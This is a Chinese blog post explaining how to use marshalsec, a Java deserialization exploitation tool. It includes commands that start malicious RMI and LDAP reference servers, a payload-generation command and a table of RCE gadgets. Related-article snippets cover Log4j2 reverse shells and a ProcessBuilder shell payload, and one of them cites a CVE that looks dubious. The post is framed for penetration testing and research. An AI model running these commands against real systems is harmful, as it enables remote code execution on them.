最新版本marshalsec

最新推荐文章于 2025-04-16 10:22:24 发布
原创 最新推荐文章于 2025-04-16 10:22:24 发布 · 5.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了marshalsec工具的下载、使用方法及命令格式,包括如何生成与使用不同的payloads,以及支持的各种exploit和payload类型,适用于安全研究与渗透测试。

工具下载

marshalsec-0.3.0.3-SNAPSHOT-all.jar下载

下载地址:https://download.youkuaiyun.com/download/Fly_hps/12409277

工具使用

命令格式

marshalsec命令格式如下:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]

参数说明:

  • -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin)
  • -t:对生成的payloads进行解码测试
  • -v:verbose mode, 展示生成的payloads
  • gadget_type:指定使用的payload
  • arguments - payload运行时使用的参数
  • marshalsec.<marshaller>:指定exploits,根目录下的java文件名

开启RMI服务

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启LDAP服务

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

查询可用Gadget

java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson //以Jackson为例

生成特定Payload

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Hessian -v XBean http://127.0.0.1:8080/ExecObject

攻击载荷

目前marshalsec支持的exploit和payload有:

MarshallerGadget Impact
BlazeDSAMF(0|3|X)JDK only escalation to Java serialization various third party libraries RCEs
Hessian|Burlapvarious third party RCEs
Castordependency library RCE
Jacksonpossible JDK only RCE, various third party RCEs
Javayet another third party RCE
JsonIOJDK only RCE
JYAMLJDK only RCE
Kryothird party RCEs
KryoAltStrategyJDK only RCE
Red5AMF(0|3)JDK only RCE
SnakeYAMLJDK only RCEs
XStreamJDK only RCEs
YAMLBeansthird party RCE
【vulhub漏洞复现】Fastjson 1.2.47 反序列化漏洞复现
一剑开天门!的博客
02-17 2297
【vulhub漏洞复现】Fastjson 1.2.47 反序列化漏洞复现
fastjson1.2.24-RCE漏洞复现
three_1996的博客
03-15 2150
Fastjison在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链,造成远程代码执行。
marshalsec-0.0.3-SNAPSHOT-all.jar
08-23
Moritz Bechler编写,源码地址为:https://github.com/mbechler/marshalsec下载下来之后使用maven编译,此工具为编译好的jar包,方便没有编译环境的同学们直接jar包开启ldap和rmi服务 开启rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS/ExportObject 1099 开启ldap服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS/ExportObject 1389 我使用这个来测试springboot jolokia的远程命令执行,也可以测试struts2 S系列的漏洞
Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
Hi~ 土拨鼠
12-16 5337
文章目录1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell 最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是做安全的嘛!今天我就来复现一下 1、构造EXP import java.io.BufferedReader; import java.io.InputStream; i
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
marshalsec-0.0.3-SNAPSHOT-all.zip
12-14
marshalsec测试反序化漏洞可使用
java 开源项目marshalsec,快速搭建jndi相关server,目前实现了ldap,rmi。
FREEDOM
12-11 2866
开源项目的git代码地址:GitHub - mbechler/marshalsec 编译 这里跳过编译时的test mvn "-Dmaven.test.skip=true" -P clean package 编译后target目录 演示如何启动ldap服务 上传编译后的class文件到http服务器 把Exploit.class文件放在http服务器上,这里使用nginx服务器,访问地址为http://127.0.0.1/test/Exploit.class. 启动ldap...
marshalsec.zip
05-11
marshalsec安全工具
marshalsec java反序列化利用工具
最新发布
M1665487923的博客
04-16 1649
通过模拟恶意服务(如 RMI、LDAP 和 HTTP)和生成特定序列化 payload,帮助研究人员验证漏洞并实现远程代码执行(RCE)。其核心功能包括: JNDI 注入模拟:通过构造恶意 JNDI 链接(如 rmi://IP:PORT/Object),触发目标系统加载远程恶意类; 多协议支持:兼容 RMI、LDAP 等协议,可托管恶意类文件并响应攻击请求; Payload 生成:支持 Hessian、Jackson 等序列化库的 payload 生成,覆盖广泛漏洞场景。
java 反序列化利用工具 marshalsec 使用简介
热门推荐
whatday的专栏
08-11 2万+
命令格式 marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, Spri
marshalsec
01-27
### Marshalsec 技术概述 Marshalsec 是一款用于创建反序列化漏洞利用程序的 Java 工具库。该工具允许安全研究人员测试和开发针对存在反序列化漏洞的应用程序的有效载荷[^1]。 #### 安装与配置 为了使用 Marshalsec,需先安装 JDK 和 Maven。接着可以通过克隆官方 GitHub 仓库来获取项目源码并编译: ```bash git clone https://github.com/mbechler/marshalsec.git cd marshalsec mvn clean package -DskipTests ``` 上述命令会下载依赖项并将项目打包成可执行 JAR 文件[^2]。 #### 基本用法示例 假设目标应用程序通过 RMI 接口暴露了一个服务端点,在这种情况下可以构建如下攻击向量: ```java import jdk.nashorn.api.scripting.NashornScriptEngineFactory; // ...其他必要的导入语句... public class Exploit { public static void main(String[] args) throws Exception { String payload = "new java.lang.ProcessBuilder[&#39;/bin/sh&#39;,&#39;-c&#39;,&#39;touch /tmp/success&#39;].start()"; ScriptEngine engine = new NashornScriptEngineFactory().getScriptEngine("--language=es6"); Object result = engine.eval(payload); } } ``` 此代码片段展示了如何构造一个简单的 Payload 来触发远程命令执行操作。请注意这只是一个理论上的例子,实际应用时应当更加谨慎,并遵循合法合规的原则[^3]。 #### 实战案例分析 曾经有报告指出 Apache ActiveMQ 存在一个严重的反序列化漏洞 (CVE-2018-9744),攻击者能够借助 Marshalsec 构建特定的数据包发送给未打补丁的服务实例从而实现任意代码执行的目的。这类场景充分体现了掌握此类技能对于渗透测试人员的重要性[^4]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值